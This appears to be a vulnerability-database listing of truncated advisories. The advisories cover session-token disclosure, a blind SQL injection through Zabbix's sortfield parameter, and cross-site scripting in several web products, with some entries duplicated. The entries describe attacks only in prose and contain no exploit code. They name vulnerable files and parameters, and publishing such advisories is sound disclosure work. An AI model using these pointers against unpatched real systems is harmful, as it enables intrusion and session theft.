CVE-2026-29872

A cross-session information disclosure vulnerability exists in the awesome-llm-apps project in commit e46690f99c3f08be80a9877fab52acacf7ab8251 2026-01-19. The affected Streamlit-based GitHub MCP Agent stores user-supplied API tokens in process-wide environment variables using os.environ without...

CVE-2026-29872

Technical details about CVE-2026-29872 are not publicly available in the provided connected documents. The Initial Description contains information but no further technical specifics. Monitor for updates.

PT-2026-29084

Name of the Vulnerable Software and Affected Versions awesome-llm-apps versions prior to commit e46690f99c3f08be80a9877fab52acacf7ab8251 Description A cross-session information disclosure issue exists in the awesome-llm-apps project. The Streamlit-based GitHub MCP Agent stores user-supplied API...

EUVD-2026-14955

A low privilege Zabbix user with API access can exploit a blind SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL selects via the sortfield parameter. Although query results are not returned directly, an attacker can exfiltrate arbitrary database data...

UBUNTU-CVE-2026-23921

A low privilege Zabbix user with API access can exploit a blind SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL selects via the sortfield parameter. Although query results are not returned directly, an attacker can exfiltrate arbitrary database data...

PT-2026-27475

Name of the Vulnerable Software and Affected Versions Zabbix versions prior to 7.4.6 Description A Zabbix user with API access can exploit a blind SQL injection in the CApiService.php file. The issue resides in the sortfield parameter, allowing an attacker to execute arbitrary SQL selects. While...

CVE-2026-33043 AVideo affected by Session Hijacking via Unauthenticated Session ID Disclosure with Permissive CORS

WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials...

CVE-2026-2276

Reflected Cross-Site Scripting XSS vulnerability in the Wix web application, where the endpoint ' https://manage.wix.com/account/account-settings ', responsible for uploading SVG images, does not properly sanitize the content. An authenticated attacker could upload an SVG file containing embedded...

Mercury MR816v2 安全漏洞

The Mercury MR816v2 is an access control device from Mercury China. A security vulnerability exists in Mercury MR816v2 081C3114 version 4.8.7 Build 110427 Rel 36550n, which originates from stored cross-site scripting and could lead to the disclosure of an administrator's session and the execution...

EUVD-2025-198158

A reflected cross-site scripting XSS vulnerability exists in the password change functionality of Pixeon WebLaudos 25.1 01. The slesSenha parameter to the loginAlterarSenha.asp file. An attacker can craft a malicious URL that, when visited by a victim, causes arbitrary JavaScript code to be...

Linux Distros Unpatched Vulnerability : CVE-2019-12746

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue was discovered in Open Ticket Request System OTRS Community Edition 5.0.x through 5.0.36 and 6.0.x through 6.0.19. A user logged into OTRS as an agent...

CGM CLININET 安全漏洞

CGM CLININET is a hospital information management system from CGM Germany. A security vulnerability exists in CGM CLININET that originates from a session ID disclosure via an NTFS alternate data stream...

FileBrowser has an unspecified vulnerability (CNVD-2025-22704)

FileBrowser is an open source web file browser . Provides a file management interface in a specified directory , can be used to upload , delete , preview , rename and edit your files . FileBrowser has a security vulnerability that originates from an access token passed as a GET parameter, which c...

FileBrowser 安全漏洞

FileBrowser is an open source web file browser . Provides a file management interface in a specified directory , can be used to upload , delete , preview , rename and edit your files . FileBrowser has a security vulnerability that originates from an access token passed as a GET parameter, which c...

Ispmanager Security Vulnerability

Ispmanager is a Linux-based control panel from Ispmanager, Inc. It is used to manage dedicated, gaming and VPS web servers, as well as sell shared hosting. A security vulnerability exists in Ispmanager version 6.98.0, which stems from an information disclosure issue that allows an attacker to...

CVE-2024-27179 Session disclosure inside the log files

Admin cookies are written in clear-text in logs. An attacker can retrieve them and bypass the authentication mechanism. As for the affected products/models/versions, see the reference URL...

CVE-2024-27179 Session disclosure inside the log files

Admin cookies are written in clear-text in logs. An attacker can retrieve them and bypass the authentication mechanism. As for the affected products/models/versions, see the reference URL...

Session Token Disclosure

activestorage is vulnerable to Sensitive Information Disclosure. The vulnerability is due to the Set-Cookie header getting cached when serving blobs if Rails is behind a proxy. Certain proxies may cache the Set-Cookie header, which can result in a users session being disclosed to another user...

Central Dogma Security Breach

Central Dogma is an open source service configuration version control repository based on Git, ZooKeeper and HTTP/2. A security vulnerability exists in versions of Central Dogma prior to 0.64.0 that stems from vulnerability to cross-site scripting XSS attacks, which could lead to user session...

PT-2024-1394 · Totolink · Totolink N350Rt

Name of the Vulnerable Software and Affected Versions: Totolink N350RT version 9.3.5u.6255 Description: The issue is related to the /cgi-bin/cstecgi.cgi file in the Totolink N350RT router's firmware, which is associated with incorrect session expiration. This can be exploited by a remote attacker...